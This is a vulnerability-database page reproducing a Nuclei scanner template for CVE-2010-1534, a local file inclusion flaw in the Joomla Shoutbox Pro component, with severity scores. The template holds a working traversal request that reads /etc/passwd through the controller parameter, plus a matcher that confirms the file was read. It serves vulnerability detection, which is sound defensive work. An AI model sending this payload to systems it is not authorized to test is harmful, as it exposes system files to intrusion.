Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1534
HistorySep 07, 2021 - 12:35 a.m.

Joomla! Component Shoutbox Pro - Local File Inclusion

2021-09-0700:35:15
ProjectDiscovery
github.com
7
joomla
component
shoutbox
local file inclusion
exploit-db
batjo

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.014

Percentile

86.5%

A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1534

info:
  name: Joomla! Component Shoutbox Pro - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version
  reference:
    - https://www.exploit-db.com/exploits/12067
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1534
    - http://www.exploit-db.com/exploits/12067
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1534
    cwe-id: CWE-22
    epss-score: 0.01385
    epss-percentile: 0.86323
    cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla.batjo
    product: com_shoutbox
  tags: cve2010,cve,joomla,lfi,edb,joomla.batjo

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220627c0439bed5f9c857145fb35f1a5e4152607d796e171b2b35aab09be7387341022066442ae0a3a5ca34a7cc9658c5644f13efdf60281a3652b3a95f493277194bcd:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.014

Percentile

86.5%

Related for NUCLEI:CVE-2010-1534